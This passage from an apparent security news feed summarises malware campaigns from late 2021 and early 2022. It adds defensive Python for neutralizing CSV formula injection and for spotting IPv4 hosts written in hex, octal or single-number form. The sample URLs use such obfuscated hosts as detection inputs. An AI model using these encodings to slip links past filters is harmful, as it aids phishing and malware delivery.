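    for row_no, col_no, risk, cell in scan_csv(SAMPLE_CSV):
        print(f"row {row_no} col {col_no}: {risk:7s} {cell!r} -> {neutralize_cell(cell)!r}")
```

The same check belongs on the producing side: any application that exports user-supplied strings to CSV should apply neutralize_cell (or quote-and-prefix) before writing, because the file will be opened in a spreadsheet whether or not that was intended.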
February 01, 2022
Powerful new Oski variant ‘Mars Stealer’ grabbing 2FAs and crypto Full Text
Abstract
A new and powerful malware named 'Mars Stealer' has appeared in the wild, and appears to be a redesign of the Oski malware that shut down development abruptly in the summer of 2020.BleepingComputer
February 01, 2022
SolarMarker Malware Uses Novel Techniques to Persist on Hacked Systems Full Text
Abstract
In a sign that threat actors continuously shift tactics and update their defensive measures, the operators of the SolarMarker information stealer and backdoor have been found leveraging stealthy Windows Registry tricks to establish long-term persistence on compromised systems. Cybersecurity firm Sophos, which spotted the new behavior, said that the remote access implants are still being detected on targeted networks despite the campaign witnessing a decline in November 2021. Boasting of information harvesting and backdoor capabilities, the .NET-based malware has been linked to at least three different attack waves in 2021. The first set, reported in April, took advantage of search engine poisoning techniques to trick business professionals into visiting sketchy Google sites that installed SolarMarker on the victim's machines. Then in August, the malware was observed targeting healthcare and education sectors with the goal of gathering credentials and sensitive information.The Hacker News
January 31, 2022
Cobalt Strike and Prometheus Traffic Direction System - New Tools of the Cyber Threat Trade Full Text
Abstract
BlackBerry researchers have discovered the relationship between the Prometheus Traffic Direction System and a leaked Cobalt Strike SSL key pair, as well as with various malware families. In the last two years, multiple threat actors and ransomware groups such as FIN7, FickerStealer, Qakbot, DarkCry ... Cyware Alerts - Hacker News
January 28, 2022
Shlayer and Bundlore MacOS Malware Strains – How Uptycs EDR Detection Can Help Full Text
Abstract
MacOS malware Shlayer and Bundlore may have variations, but the behavior of their attacks has not changed – attacking older macOS versions and poorly-protected websites.Threatpost
January 27, 2022
Chaes Banking Trojan Hijacks Chrome Browser with Malicious Extensions Full Text
Abstract
A financially-motivated malware campaign has compromised over 800 WordPress websites to deliver a banking trojan dubbed Chaes targeting Brazilian customers of Banco do Brasil, Loja Integrada, Mercado Bitcoin, Mercado Livre, and Mercado Pago. First documented by Cybereason in November 2020, the info-stealing malware is delivered via a sophisticated infection chain that's engineered to harvest sensitive consumer information, including login credentials, credit card numbers, and other financial information. "Chaes is characterized by the multiple-stage delivery that utilizes scripting frameworks such as JScript, Python, and NodeJS, binaries written in Delphi, and malicious Google Chrome extensions," Avast researchers Anh Ho and Igor Morgenstern said. "The ultimate goal of Chaes is to steal credentials stored in Chrome and intercept logins of popular banking websites in Brazil." The attack sequence is triggered when users visit one of the infected websitesThe Hacker News
January 27, 2022
A new highly evasive technique used to deliver the AsyncRAT Malware Full Text
Abstract
Experts spotted a sophisticated malware campaign delivering the AsyncRAT trojan since September 2021. Researchers from Morphisec spotted a sophisticated phishing campaign delivering the AsyncRAT trojan since September 2021. The phishing messages...Security Affairs
January 26, 2022
‘Dark Herring’ Billing Malware Swims onto 105M Android Devices Full Text
Abstract
The mobile malware heisted hundreds of millions of dollars from unsuspecting users, thanks to 470 different well-crafted malicious apps in Google Play.Threatpost
January 26, 2022
Chaes banking trojan hijacks Chrome with malicious extensions Full Text
Abstract
A large-scale campaign involving over 800 compromised WordPress websites is spreading banking trojans that target the credentials of Brazilian e-banking users.BleepingComputer
January 26, 2022
BHUNT - New Password Stealer Aiming for Crypto Wallets Full Text
Abstract
BHUNT is a new crypto stealer family and was spotted by Bitdefender. It is written in .NET and is capable of pilfering wallet content from Electrum, Bitcoin, Ethereum, Exodus, and Atomic, among others.Cyware Alerts - Hacker News
January 25, 2022
MoonBounce: Third UEFI Bootkit in Town Full Text
Abstract
Kaspersky unearthed MoonBounce, a custom UEFI firmware implant, that can hide in the system across disk formatting or replacement. It appears to be the brainwork of the Chinese Winnti group. The infection chain does not leave any evidence and works entirely in memory. Researchers advise enabling Se ... Cyware Alerts - Hacker News
January 25, 2022
TrickBot Malware Using New Techniques to Evade Web Injection Attacks Full Text
Abstract
The cybercrime operators behind the notorious TrickBot malware have once again upped the ante by fine-tuning its techniques and adding multiple layers of defense to slip past antimalware products. "As part of that escalation, malware injections have been fitted with added protection to keep researchers out and get through security controls," IBM Trusteer said in a report. "In most cases, these extra protections have been applied to injections used in the process of online banking fraud — TrickBot's main activity since its inception after the Dyre Trojan's demise." TrickBot, which started out as a banking trojan, has evolved into a multi-purpose crimeware-as-a-service (CaaS) that's employed by a variety of actors to deliver additional payloads such as ransomware. Over 100 variations of TrickBot have been identified to date, one of which is a "Trickboot" module that can modify the UEFI firmware of a compromised device. In the fall of 2The Hacker News
January 25, 2022
Latest version of Android RAT BRATA wipes devices after stealing data Full Text
Abstract
A new version of the BRATA malware implements a functionality to perform a factory reset of the device to wipe all data. The new version of the BRATA Android malware supports new features, including GPS tracking and a functionality to perform a factory...Security Affairs
January 25, 2022
New DazzleSpy malware targets macOS users in watering hole attack Full Text
Abstract
A new watering hole attack has been discovered targeting macOS users and visitors of a pro-democracy radio station website in Hong Kong and infecting them with the DazzleSpy malwareBleepingComputer
January 24, 2022
Mobile Banking Trojan BRATA Gains New, Dangerous Capabilities Full Text
Abstract
The Android malware tracked as BRATA has been updated with new features that grant it the ability to track device locations and even perform a factory reset in an apparent bid to cover up fraudulent wire transfers. The latest variants, detected late last year, are said to be distributed through a downloader to avoid being detected by security software, Italian cybersecurity firm Cleafy said in a technical write-up. Targets include banks and financial institutions in the U.K., Poland, Italy, and Latin America. "What makes Android RAT so interesting for attackers is its capability to operate directly on the victim devices instead of using a new device," Cleafy researchers noted in December 2021. "By doing so, Threat Actors (TAs) can drastically reduce the possibility of being flagged "as suspicious", since the device's fingerprinting is already known to the bank." First seen in the wild at the end of 2018 and short for "Brazilian Remote AcThe Hacker News
January 24, 2022
Hackers Using New Malware Packer DTPacker to Avoid Analysis, Detection Full Text
Abstract
A previously undocumented malware packer named DTPacker has been observed distributing multiple remote access trojans (RATs) and information stealers such as Agent Tesla, Ave Maria, AsyncRAT, and FormBook to plunder information and facilitate follow-on attacks. "The malware uses multiple obfuscation techniques to evade antivirus, sandboxing, and analysis," enterprise security company Proofpoint said in an analysis published Monday. "It is likely distributed on underground forums." The .NET-based commodity malware has been associated with dozens of campaigns and multiple threat groups, both advanced persistent threat (APT) and cybercrime actors, since 2020, with the intrusions aimed at hundreds of customers across many sectors. Attack chains involving the packer rely on phishing emails as an initial infection vector. The messages contain a malicious document or a compressed executable attachment, which, when opened, deploys the packer to launch the malware.The Hacker News
January 24, 2022
Researchers break down WhisperGate wiper malware used in Ukraine website defacement Full Text
Abstract
The malware used to strike Ukrainian government websites has similarities to the NotPetya wiper but has more capabilities "designed to inflict additional damage," researchers say.ZDNet
January 24, 2022
Android malware BRATA wipes your device after stealing data Full Text
Abstract
The Android malware known as BRATA has added new and dangerous features to its latest version, including GPS tracking, the capacity to use multiple communication channels, and a function that performs a factory reset on the device to wipe all traces of malicious activity.BleepingComputer
January 24, 2022
Malicious PowerPoint files used to push remote access trojans Full Text
Abstract
Since December 2021, a growing trend in phishing campaigns has emerged that uses malicious PowerPoint documents to distribute various types of malware, including remote access and information-stealing trojans.BleepingComputer
January 21, 2022
Spyware Blitzes Compromise, Cannibalize ICS Networks Full Text
Abstract
The brief spearphishing campaigns spread malware and use compromised networks to steal credentials that can be sold or used to commit financial fraud.Threatpost
January 21, 2022
Diavol Ransomware has Connections with TrickBot Full Text
Abstract
The FBI first learned of Diavol ransomware in October 2021. The FBI has not yet observed Diavol leak victim data, despite ransom notes including threats to leak stolen information.Heimdal Security
January 21, 2022
Emotet Spam Abuses Unconventional IP Address Formats to Spread Malware Full Text
Abstract
New Emotet spam campaigns were found using hexadecimal and octal representations of IP addresses, likely to evade detection via pattern matching. Both routines try to trick users into enabling macros.Trend Micro
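The evasion works because a URL filter that matches on dotted-decimal strings never sees "192.0.2.1" when the lure writes the same address as 0xC0000201, as 0300.0.02.01, or as the single decimal number 3221226001; the resolver in the victim's browser accepts all of them because inet_aton does. The normalizer below is an added example for this page, not code from Trend Micro or from the Emotet campaign; the URLs are constructed. It implements the full inet_aton rules (hex, octal and decimal components, and one to four components with the last one filling the remaining bytes), which is more than the two forms the abstract names, so it also catches the "dword" form.

```python
import ipaddress
from typing import List, Optional
from urllib.parse import urlsplit

# Constructed sample URLs for this example (not Emotet indicators). All four IP-literal
# hosts resolve to the same address, 192.168.1.10, written four different ways.
SAMPLE_URLS = [
    "http://192.168.1.10/doc/invoice.zip",        # plain dotted decimal
    "http://0xc0a8010a/doc/invoice.zip",          # whole address as one hex number
    "http://0300.0250.01.012/doc/invoice.zip",    # octal components (leading zero)
    "http://3232235786/doc/invoice.zip",          # whole address as one decimal ("dword")
    "http://example.com/doc/invoice.zip",         # a real hostname, must be left alone
]


def _component(tok: str) -> Optional[int]:
    """Parse one dotted component the way inet_aton does: 0x = hex, leading 0 = octal, else decimal."""
    try:
        if tok[:2].lower() == "0x":
            v = int(tok[2:], 16)
        elif len(tok) > 1 and tok[0] == "0":
            v = int(tok, 8)
        else:
            v = int(tok, 10)
    except ValueError:
        return None
    return v if v >= 0 else None


def canonical_ipv4(host: str) -> Optional[str]:
    """Return the dotted-decimal form of an inet_aton-style literal, or None if host is not one.

    Mirrors the classic C resolver rules: up to four components; the last component
    fills all remaining bytes (so "1.2" means 1.0.0.2 and "3232235786" is the whole address).
    """
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    vals = [_component(p) for p in parts]
    if any(v is None for v in vals):
        return None
    last_bits = 8 * (5 - len(parts))
    if any(v > 0xFF for v in vals[:-1]) or vals[-1] >= (1 << last_bits):
        return None
    num = 0
    for v in vals[:-1]:
        num = (num << 8) | v
    num = (num << last_bits) | vals[-1]
    return str(ipaddress.IPv4Address(num))


def is_obfuscated_host(host: str) -> bool:
    """True for an IPv4 literal that is not already written in plain dotted decimal."""
    canon = canonical_ipv4(host)
    return canon is not None and canon != host


def find_obfuscated(urls: List[str]) -> List[str]:
    """Return the URLs whose host is an IPv4 literal in hex, octal or single-number form."""
    return [u for u in urls if is_obfuscated_host(urlsplit(u).hostname or "")]


if __name__ == "__main__":
    for u in SAMPLE_URLS:
        host = urlsplit(u).hostname or ""
        print(f"{host:22s} -> {canonical_ipv4(host)}  obfuscated={is_obfuscated_host(host)}")
```

Two uses follow from this: run canonical_ipv4 on every extracted host before comparing it with an IP blocklist, and treat is_obfuscated_host returning True as a signal on its own, since legitimate mail almost never links to an address written in octal.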
January 19, 2022
New BHUNT Password Stealer Malware Targeting Cryptocurrency Wallets Full Text
Abstract
A new evasive crypto wallet stealer named BHUNT has been spotted in the wild with the goal of financial gain, adding to a list of digital currency stealing malware such as CryptBot, Redline Stealer, and WeSteal. "BHUNT is a modular stealer written in .NET, capable of exfiltrating wallet (Exodus, Electrum, Atomic, Jaxx, Ethereum, Bitcoin, Litecoin wallets) contents, passwords stored in the browser, and passphrases captured from the clipboard," Bitdefender researchers said in a technical report on Wednesday. The campaign, distributed globally across Australia, Egypt, Germany, India, Indonesia, Japan, Malaysia, Norway, Singapore, South Africa, Spain, and the U.S., is suspected to be delivered to compromised systems via cracked software installers. The modus operandi of using cracks as an infection source for initial access mirrors similar cybercrime campaigns that have leveraged tools such as KMSPico as a conduit for deploying malware. "Most infected users alsoThe Hacker News
January 19, 2022
Destructive Wiper Targeting Ukraine Aimed at Eroding Trust, Experts Say Full Text
Abstract
Disruptive malware attacks on Ukrainian organizations (posing as ransomware attacks) are very likely part of Russia’s wider effort to undermine Ukraine’s sovereignty, according to analysts.Threatpost
January 19, 2022
New BHUNT malware targets your crypto wallets and passwords Full Text
Abstract
A novel modular crypto-wallet stealing malware dubbed 'BHUNT' has been spotted targeting cryptocurrency wallet contents, passwords, and security phrases.BleepingComputer
January 18, 2022
New FluBot Malware Variant Imitates Flash Player to Trick Users Full Text
Abstract
Researchers at F5 Networks observed a new smishing campaign by the FluBot malware operators, camouflaged as Flash Player, to target Android users. The FluBot version 5.2 comes with important improvements including the implementation of a new command to change the domain generation algorithms seed r ... Cyware Alerts - Hacker News
January 17, 2022
Linux malware is on the rise. Here are three top threats right now Full Text
Abstract
Linux-based systems are everywhere and are a core part of the internet infrastructure but it's low-powered IoT devices that have become the main target for Linux malware.ZDNet
January 16, 2022
A New Destructive Malware Targeting Ukrainian Government and Business Entities Full Text
Abstract
Cybersecurity teams from Microsoft on Saturday disclosed they identified evidence of a new destructive malware operation targeting government, non-profit, and information technology entities in Ukraine amid brewing geopolitical tensions between the country and Russia. "The malware is disguised as ransomware but, if activated by the attacker, would render the infected computer system inoperable," Tom Burt, corporate vice president of customer security and trust at Microsoft, said, adding the intrusions were aimed at government agencies that provide critical executive branch or emergency response functions. Also targeted is an IT firm that "manages websites for public and private sector clients, including government agencies whose websites were recently defaced," Burt noted. The computing giant, which first detected the malware on January 13, attributed the attacks to an emerging threat cluster codenamed "DEV-0586," with no observed overlaps in tactThe Hacker News
January 13, 2022
SysJoker, a previously undetected cross-platform backdoor made the headlines Full Text
Abstract
Security researchers found a new cross-platform backdoor, dubbed SysJoker, that is suspected to be the work of an APT group. Security experts from Intezer discovered a new backdoor, dubbed SysJoker, that is able to infect Windows, macOS, and Linux...Security Affairs
January 12, 2022
New SysJoker Espionage Malware Targeting Windows, macOS, and Linux Users Full Text
Abstract
A new cross-platform backdoor called "SysJoker" has been observed targeting machines running Windows, Linux, and macOS operating systems as part of an ongoing espionage campaign that's believed to have been initiated during the second half of 2021. "SysJoker masquerades as a system update and generates its [command-and-control server] by decoding a string retrieved from a text file hosted on Google Drive," Intezer researchers Avigayil Mechtinger, Ryan Robinson, and Nicole Fishbein noted in a technical write-up publicizing their findings. "Based on victimology and malware's behavior, we assess that SysJoker is after specific targets." The Israeli cybersecurity company, attributing the work to an advanced threat actor, said it first discovered evidence of the implant in December 2021 during an active attack against a Linux-based web server belonging to an unnamed educational institution. A C++-based malware, SysJoker is delivered via a drThe Hacker News
January 12, 2022
New RedLine malware version distributed as fake Omicron stat counter Full Text
Abstract
Experts warn of a new variant of the RedLine malware that is distributed via emails as fake COVID-19 Omicron stat counter app as a lure. Fortinet researchers have spotted a new version of the RedLine info-stealer that is spreading via emails using...Security Affairs
January 12, 2022
Cloud Apps Replace Web as Source for Most Malware Downloads Full Text
Abstract
Two-thirds of all malware distributed to enterprise networks last year originated from cloud apps such as Google Drive, OneDrive, and numerous other cloud apps, new research shows.Dark Reading
January 11, 2022
‘Fully Undetected’ SysJoker Backdoor Malware Targets Windows, Linux & macOS Full Text
Abstract
The malware establishes initial access on targeted machines, then waits for additional code to execute.Threatpost
January 11, 2022
New RedLine malware version spread as fake Omicron stat counter Full Text
Abstract
A new variant of the RedLine info-stealer is distributed via emails using a fake COVID-19 Omicron stat counter app as a lure.BleepingComputer
January 11, 2022
New SysJoker backdoor targets Windows, macOS, and Linux Full Text
Abstract
A new multi-platform backdoor malware named 'SysJoker' has emerged in the wild, targeting Windows, Linux, and macOS with the ability to evade detection on all three operating systems.BleepingComputer
January 9, 2022
New Ways to Hide Malware Inside SSD Firmware Discovered Full Text
Abstract
The attacks target drives with flex capacity features and hidden areas on the device called over-provisioning areas used by SSD makers for performance optimization on storage systems based on NAND flash.Cyware Alerts - Hacker News
January 08, 2022
Trojanized dnSpy app drops malware cocktail on researchers, devs Full Text
Abstract
Hackers targeted cybersecurity researchers and developers this week in a sophisticated malware campaign distributing a malicious version of the dnSpy .NET application to install cryptocurrency stealers, remote access trojans, and miners.BleepingComputer
January 8, 2022
FluBot malware continues to evolve. What’s new in Version 5.0 and beyond? Full Text
Abstract
Researchers warn of new campaigns distributing a new improved version of the FluBot malware posing as Flash Player. Researchers from F5 security are warning of a new enhanced version of the FluBot Android malware that spreads posing as Flash Player....Security Affairs
January 07, 2022
FluBot malware now targets Europe posing as Flash Player app Full Text
Abstract
The widely distributed FluBot malware continues to evolve, with new campaigns distributing the malware as Flash Player and the developers adding new features.BleepingComputer
January 6, 2022
Apple iPhone Malware Tactic Causes Fake Shutdowns to Enable Spying Full Text
Abstract
The ‘NoReboot’ technique is the ultimate in persistence for iPhone malware, preventing reboots and enabling remote attackers to do anything on the device while remaining completely unseen.Threatpost
January 06, 2022
New Trick Could Let Malware Fake iPhone Shutdown to Spy on Users Secretly Full Text
Abstract
Researchers have disclosed a novel technique by which malware on iOS can achieve persistence on an infected device by faking its shutdown process, making it impossible to physically determine if an iPhone is off or otherwise. The discovery — dubbed "NoReboot" — comes courtesy of mobile security firm ZecOps, which found that it's possible to block and then simulate an iOS rebooting operation, deceiving the user into believing that the phone has been powered off when, in reality, it's still running. The San Francisco-headquartered company called it the "ultimate persistence bug […] that cannot be patched because it's not exploiting any persistence bugs at all — only playing tricks with the human mind." NoReboot works by interfering with the routines used in iOS to shut down and restart the device, effectively preventing them from ever happening in the first place and allowing a trojan to achieve persistence without persistence as the device is neverThe Hacker News
January 6, 2022
NoReboot persistence technique fakes iPhone shutdown Full Text
Abstract
Researchers devised a sophisticated persistence technique, named NoReboot, for iOS malware that fakes shutdowns. Researchers from ZecOps devised a sophisticated persistence technique, named NoReboot, for iOS malware that fakes shutdowns while spies...Security Affairs
January 05, 2022
New Zloader Banking Malware Campaign Exploiting Microsoft Signature Verification Full Text
Abstract
An ongoing ZLoader malware campaign has been uncovered exploiting remote monitoring tools and a nine-year-old flaw concerning Microsoft's digital signature verification to siphon user credentials and sensitive information. Israeli cybersecurity company Check Point Research, which has been tracking the sophisticated infection chain since November 2021, attributed it to a cybercriminal group dubbed Malsmoke, citing similarities with previous attacks. "The techniques incorporated in the infection chain include the use of legitimate remote management software (RMM) to gain initial access to the target machine," Check Point's Golan Cohen said in a report shared with The Hacker News. "The malware then exploits Microsoft's digital signature verification method to inject its payload into a signed system DLL to further evade the system's defenses." The campaign is said to have claimed 2,170 victims across 111 countries as of January 2, 2022, with moThe Hacker News
January 5, 2022
‘Malsmoke’ Exploits Microsoft’s E-Signature Verification Full Text
Abstract
The info-stealing campaign using ZLoader malware – previously used to deliver Ryuk and Conti ransomware – already has claimed more than 2,000 victims across 111 countries.Threatpost
January 05, 2022
iOS malware can fake iPhone shut downs to snoop on camera, microphone Full Text
Abstract
Researchers have developed a new technique that fakes a shutdown or reboot of iPhones, preventing malware from being removed and allowing hackers to secretly snoop on microphones and receive sensitive data via a live network connection.BleepingComputer
January 4, 2022
Remote Access Malware Rises, Ransomware Operators Rebrand, and More Attacks on Individuals: Report Full Text
Abstract
According to a Positive Technologies report, the number of attacks in Q3 2021 decreased by 4.8% as compared to Q2 2021. This was mainly caused by some major ransomware players leaving the market.Cyware Alerts - Hacker News
January 4, 2022
Purple Fox backdoor spreads through fake Telegram App installer Full Text
Abstract
Threat actors are spreading the Purple Fox backdoor using tainted installers of the Telegram messaging application. Threat actors are using weaponized installers of the Telegram messaging application to deliver the Purple Fox backdoor on Windows systems. Researchers...Security Affairs
January 03, 2022
Purple Fox malware distributed via malicious Telegram installers Full Text
Abstract
A laced Telegram for desktop installer was spotted distributing the Purple Fox malware while disabling the UAC on the infected systems.BleepingComputer
January 3, 2022
RedLine Malware Pilfer Passwords Saved in Multiple Browsers Full Text
Abstract
RedLine information stealer was found targeting popular web browsers such as Edge, Opera, Whale, and Chrome and extracting passwords saved in these. The stealer is a commodity malware that can be purchased at an affordable price of just $200 on cybercrime forums. Users are recommended to use a th ... Cyware Alerts - Hacker News
December 31, 2021
How to implant a malware in hidden area of SSDs with Flex Capacity feature Full Text
Abstract
Researchers devised a series of attacks against SSDs that could allow attackers to implant malware in a location that is not monitored by security solutions. Korean researchers devised a series of attacks against solid-state drives (SSDs) that could allow attackers to implant...Security Affairs
December 30, 2021
New iLOBleed Rootkit Targeting HP Enterprise Servers with Data Wiping Attacks Full Text
Abstract
A previously unknown rootkit has been found setting its sights on Hewlett Packard Enterprise's Integrated Lights-Out (iLO) server management technology to carry out in-the-wild attacks that tamper with the firmware modules and completely wipe data off the infected systems. The discovery, which is the first instance of real-world malware in iLO firmware, was documented by Iranian cybersecurity firm Amnpardaz this week. "There are numerous aspects of iLO that make it an ideal utopia for malware and APT groups: Extremely high privileges (above any level of access in the operating system), very low-level access to the hardware, being totally out of the sight of the admins, and security tools, the general lack of knowledge and tools for inspecting iLO and/or protecting it, the persistence it provides for the malware to remain even after changing the operating system, and in particular being always running and never shutting down," the researchers said. Besides managinThe Hacker News
December 30, 2021
New iLOBleed Rootkit, the first time ever that malware targets iLO firmware Full Text
Abstract
A previously unknown rootkit, dubbed iLOBleed, was used in attacks aimed at HP Enterprise servers that wiped data off the infected systems. iLOBleed is a previously undetected rootkit that was spotted targeting the HP Enterprise's Integrated Lights-Out...Security Affairs
December 28, 2021
New Flagpro malware linked to Chinese state-backed hackers Full Text
Abstract
The cyber-espionage APT (advanced persistent threat) group tracked as 'BlackTech' was spotted using a novel malware called 'Flagpro' in attacks against Japanese firms.BleepingComputer
December 28, 2021
Threat actors are abusing MSBuild to implant Cobalt Strike Beacons Full Text
Abstract
Experts warn of malicious campaigns abusing Microsoft Build Engine (MSBuild) to execute a Cobalt Strike payload on compromised systems. A security expert from Morphus Labs recently observed several malicious campaigns abusing Microsoft Build Engine...Security Affairs
December 28, 2021
RedLine malware shows why passwords shouldn’t be saved in browsers Full Text
Abstract
The RedLine information-stealing malware targets popular web browsers such as Chrome, Edge, and Opera, demonstrating why storing your passwords in browsers is a bad idea.BleepingComputer
December 28, 2021
Riskware Android streaming apps found on Samsung’s Galaxy store Full Text
Abstract
Samsung's official Android app store, called the Galaxy Store, has had an infiltration of riskware apps that triggered multiple Play Protect warnings on people's devices.BleepingComputer
December 27, 2021
Echelon Infostealer Drops in via Telegram Full Text
Abstract
A Telegram handle was found distributing malicious Echelon infostealer targeted at users of a cryptocurrency discussion channel on the messaging platform. Echelon aims to steal login credentials from popular file-sharing platforms and messaging applications including FileZilla, Discord, Outlook, E ... Cyware Alerts - Hacker News
December 27, 2021
‘Spider-Man: No Way Home’ Pirated Downloads Contain Crypto-Mining Malware Full Text
Abstract
Peter Parker might not be a mastermind cryptocurrency criminal, but the name Spiderman is quickly becoming more associated with the mining landscape. ReasonLabs, a leading provider of cybersecurity prevention and detection software, recently discovered a new form of malware hacking into customer computers in the guise of the latest Spiderman movie. As perhaps the most talked-about movie for some time, Spiderman: No Way Home represents an excellent opportunity for hackers. It's a chance to connect with millions of potential targets, and hack into computers all around the globe. All today's malicious actors need to do is promise their victims access to the latest movie, and they get an all-access pass to their PC. The cryptocurrency mining malware discovered by ReasonLabs disguises itself as a torrent for the Spiderman: No Way Home movie, encouraging viewers around the world to download the file, and open the computer to criminals. Using a Mask: Tricking Users into DowThe Hacker News
December 27, 2021
New Android Malware Targeting Brazil’s Itaú Unibanco Bank Customers Full Text
Abstract
Researchers have discovered a new Android banking malware that targets Brazil's Itaú Unibanco with the help of lookalike Google Play Store pages to carry out fraudulent financial transactions on victim devices without their knowledge. "This application has a similar icon and name that could trick users into thinking it is a legitimate app related to Itaú Unibanco," Cyble researchers said in a report published last week. "The [threat actor] has created a fake Google Play Store page and hosted the malware that targets Itaú Unibanco on it under the name 'sincronizador.apk.'" The tactic of leveraging fake app store pages as a lure is not new. In March, Meta (previously Facebook) disclosed details of an attack campaign that used its platform as part of a broader operation to spy on Uyghur Muslims using rogue third-party websites that used replica domains for popular news portals and websites designed to resemble third-party Android app stores, where attackers put fake keyboard, pr ... The Hacker News
December 27, 2021
New Blister Campaign Stealthily Targets Windows Full Text
Abstract
Elastic Security researchers reported a three-month-long malware campaign delivering a stealthy loader, dubbed Blister, on Microsoft Windows. The malware loader further deploys second-stage payloads in memory including Cobalt Strike and BitRAT. Researchers suggest deploying an anti-malware solution ... Read MoreCyware Alerts - Hacker News
December 27, 2021
New Android banking Malware targets Brazil’s Itaú Unibanco Bank Full Text
Abstract
Researchers analyzed a new Android banking malware that targets Brazil's Itaú Unibanco that spreads through fake Google Play Store pages. Researchers from threat intelligence firm Cyble analyzed a new Android banking malware that targets Brazil's...Security Affairs
December 24, 2021
New Rook Ransomware Feeds Off the Code of Babuk Full Text
Abstract
The new Rook ransomware is primarily delivered via a third-party framework, for example Cobalt Strike; however, delivery via phishing email has also been reported in the wild.Sentinel One
December 24, 2021
Expert Details macOS Bug That Could Let Malware Bypass Gatekeeper Security Full Text
Abstract
Apple recently fixed a security vulnerability in the macOS operating system that could be potentially exploited by a threat actor to "trivially and reliably" bypass a "myriad of foundational macOS security mechanisms" and run arbitrary code. Security researcher Patrick Wardle detailed the discovery in a series of tweets on Thursday. Tracked as CVE-2021-30853 (CVSS score: 5.5), the issue relates to a scenario where a rogue macOS app may circumvent Gatekeeper checks, which ensure that only trusted apps can be run and that they have passed an automated process called "app notarization." The iPhone maker, crediting Gordon Long of Box with reporting the flaw, said it addressed the weakness with improved checks as part of macOS 11.6 updates officially released on September 20, 2021. "Such bugs are often particularly impactful to everyday macOS users as they provide a means for adware and malware authors to sidestep macOS security mechanisms, ... The Hacker News
December 24, 2021
New BLISTER Malware Using Code Signing Certificates to Evade Detection Full Text
Abstract
Cybersecurity researchers have disclosed details of an evasive malware campaign that makes use of valid code signing certificates to sneak past security defenses and stay under the radar with the goal of deploying Cobalt Strike and BitRAT payloads on compromised systems. The binary, a loader, has been dubbed "Blister" by researchers from Elastic Security, with the malware samples having negligible to zero detections on VirusTotal. As of writing, the infection vector used to stage the attack, as well as the ultimate objectives of the intrusion, remains unknown. A notable aspect of the attacks is that they leverage a valid code signing certificate issued by Sectigo. The malware has been observed signed with the certificate in question dating back to September 15, 2021. Elastic said it reached out to the company to ensure that the abused certificates are revoked. "Executables with valid code signing certificates are often scrutinized to a lesser degree than unsig ... The Hacker News
December 24, 2021
Android banking trojan spreads via fake Google Play Store page Full Text
Abstract
An Android banking trojan targeting Itaú Unibanco, a large financial services provider in Brazil with 55 million customers globally, is using a fake Google Play store to spread to devices.BleepingComputer
December 24, 2021
Experts warn of a new stealthy loader tracked as BLISTER Full Text
Abstract
Security researchers spotted a campaign that is employing a new stealthy malware tracked as BLISTER that targets windows systems. Elastic Security researchers uncovered a malware campaign that leverages a new malware and a stealthy loader tracked...Security Affairs
December 23, 2021
Stealthy BLISTER malware slips in unnoticed on Windows systems Full Text
Abstract
Security researchers have uncovered a malicious campaign that relies on a valid code-signing certificate to disguise malicious code as legitimate executables.BleepingComputer
December 23, 2021
AvosLocker ransomware reboots in Safe Mode to bypass security tools Full Text
Abstract
Recent AvosLocker ransomware attacks are characterized by a focus on disabling endpoint security solutions that stand in the way of threat actors.BleepingComputer
December 22, 2021
Dridex malware trolls employees with fake job termination emails Full Text
Abstract
A new Dridex malware phishing campaign is using fake employee termination emails as a lure to open a malicious Excel document, which then trolls the victim with a season's greeting message.BleepingComputer
December 21, 2021
Dridex Malware Is Installed With the Help of Log4j Vulnerability Full Text
Abstract
Cryptolaemus, a cybersecurity research group, has warned that the Log4j vulnerability is currently being used to infect Windows devices with the Dridex Trojan and Linux devices with Meterpreter.Heimdal Security
December 20, 2021
DarkWatchman RAT uses Windows Registry fileless storage mechanism Full Text
Abstract
DarkWatchman is a new lightweight JavaScript-based Remote Access Trojan (RAT) that uses novel methods for fileless persistence. Recently Prevailion experts detected a malicious JavaScript-based Remote Access Trojan (RAT) dubbed DarkWatchman that uses...Security Affairs
December 19, 2021
Over 500,000 Android Users Downloaded a New Joker Malware App from Play Store Full Text
Abstract
A malicious Android app with more than 500,000 downloads from the Google Play app store has been found hosting malware that stealthily exfiltrates users' contact lists to an attacker-controlled server and signs up users to unwanted paid premium subscriptions without their knowledge. The latest Joker malware was found in a messaging-focused app named Color Message ("com.guo.smscolor.amessage"), which has since been removed from the official app marketplace. In addition, it has been observed simulating clicks in order to generate revenue from malicious ads and connecting to servers located in Russia. Color Message "accesses users' contact list and exfiltrates it over the network [and] automatically subscribes to unwanted paid services," mobile security firm Pradeo noted. "To make it difficult to be removed, the application has the capability to hides it icon once installed." "We is [sic] committed to ensuring that the app is as useful ... The Hacker News
December 19, 2021
New stealthy DarkWatchman malware hides in the Windows Registry Full Text
Abstract
A new malware named 'DarkWatchman' has emerged in the cybercrime underground, and it's a lightweight and highly-capable JavaScript RAT (Remote Access Trojan) paired with a C# keylogger.BleepingComputer
December 17, 2021
New PseudoManuscrypt Malware Infected Over 35,000 Computers in 2021 Full Text
Abstract
Industrial and government organizations, including enterprises in the military-industrial complex and research laboratories, are the targets of a new malware botnet dubbed PseudoManuscrypt that has infected roughly 35,000 Windows computers this year alone. The name comes from its similarities to the Manuscrypt malware, which is part of the Lazarus APT group's attack toolset, Kaspersky researchers said, characterizing the operation as a "mass-scale spyware attack campaign." The Russian cybersecurity company said it first detected the series of intrusions in June 2021. At least 7.2% of all computers attacked by the malware are part of industrial control systems (ICS) used by organizations in engineering, building automation, energy, manufacturing, construction, utilities, and water management sectors that are located mainly in India, Vietnam, and Russia. Approximately a third (29.4%) of non-ICS computers are situated in Russia (10.1%), India (10%), and Brazil (9. ... The Hacker News
December 16, 2021
‘DarkWatchman’ RAT Shows Evolution in Fileless Malware Full Text
Abstract
The new tool manipulates Windows Registry in unique ways to evade security detections and is likely being used by ransomware groups for initial network access.Threatpost
December 16, 2021
Anubis Banking Trojan Resurfaces to Cripple Over 400 Financial Firms Full Text
Abstract
A new campaign by the Anubis banking trojan is aimed at nearly 400 financial institutions. The malware masqueraded as the official account management app for Orange Telecom. It collects significant information from victims by intercepting SMS, screen monitoring, GPS data collection, keylogging, file e ... Read MoreCyware Alerts - Hacker News
December 16, 2021
New Fileless Malware Uses Windows Registry as Storage to Evade Detection Full Text
Abstract
